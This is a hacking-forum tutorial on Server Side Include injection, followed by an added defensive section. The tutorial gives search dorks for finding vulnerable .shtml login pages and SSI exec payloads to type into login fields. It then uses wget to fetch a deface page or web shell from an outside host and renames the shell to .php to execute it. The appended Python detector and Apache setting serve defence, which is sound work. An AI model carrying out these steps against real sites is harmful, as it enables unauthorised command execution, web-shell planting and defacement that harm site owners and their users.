SSI (server side include) injection, shell and deface Page uploading tutorial
SSI (Server Side Include) injection is a web application exploit that lets you run your code remotely on vulnerable websites.
Server Side Include allows you to upload files with multiple extensions, but
with the .php extension you can't execute your shell; you have to rename
shell.txt to shell.php.
Let's begin ....
Dorks
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually.
To check whether a website is vulnerable, enter these commands in the Username and Password fields:
<!--#echo var="DATE_LOCAL" -->
It will show the date.
<!--#exec cmd="whoami"-->
It will display which user the server is running as.
<pre><!--#exec cmd="ls -a" --></pre> (Linux)
It will show all files in the directory.
<!-- #exec cmd="dir" --> (Windows)
It will display all files in the directory.
For example, enter
<pre><!--#exec cmd="ls -a" --></pre>
in the username and password fields to view all files of the website.
Now we have to upload our deface page or shell.
To upload a deface page, host/upload your deface page anywhere
(you can use pastehtml.com for it),
then enter this command in Username and Password:
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
To view your deface page, go to site.com/deface.html
To upload a shell to the website, you have to host your shell anywhere in .txt format,
then enter this command in the login form:
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
To check whether your txt file was uploaded, list all files using
<pre><!--#exec cmd="ls -a" --></pre>
Now you have to change the .txt extension to .php.
To rename your txt file to php, use this command:
<!--#exec cmd="mv abc.txt abc.php" -->
Now go to site.com/abc.php and access your shell.
Live demo
[You must be registered and logged in to see this link.]
(Please don't harm the site; upload your files for testing only! Thanks)
mandala - Number of posts: 86
Points : 1122093
Reputation : 3
Join date : 16.12.10
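From the defender's side, the directives shown in the post are easy to recognise in request data and easy to neutralise before they reach a page the server parses for SSI. The following is an added example, not part of the original post: the function names, the element list and the sample log lines are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# SSI directive opener: "<!--", optional whitespace, "#", then an element name.
# The element names are the standard Apache mod_include ones.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|echo|include|config|set|printenv|fsize|flastmod)\b",
    re.IGNORECASE,
)

def decode_layers(value, max_rounds=3):
    """Undo repeated URL-encoding so a double-encoded directive is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(value):
    """Return the lower-cased SSI element names found in one input value."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(decode_layers(value))]

def neutralize(value):
    """Encode input before it is written into a page the server parses for SSI."""
    return html.escape(value, quote=True)

def scan_log(lines):
    """Return (line_number, elements) for request lines carrying SSI directives."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_ssi(line)
        if found:
            hits.append((n, found))
    return hits

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /login.shtml?user=alice HTTP/1.1" 200',
    '203.0.113.9 - - "GET /login.shtml?user=%3C!--%23echo+var%3D%22DATE_LOCAL%22+--%3E HTTP/1.1" 200',
    '203.0.113.9 - - "GET /search.shtml?q=%253C!--%2520%2523exec%2520cmd%253D%2522dir%2522--%253E HTTP/1.1" 200',
]

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: SSI directive(s) in request: {found}")
```

On Apache, setting `Options IncludesNOEXEC` instead of `Options Includes` additionally disables the `#exec` element, so a missed input cannot run commands.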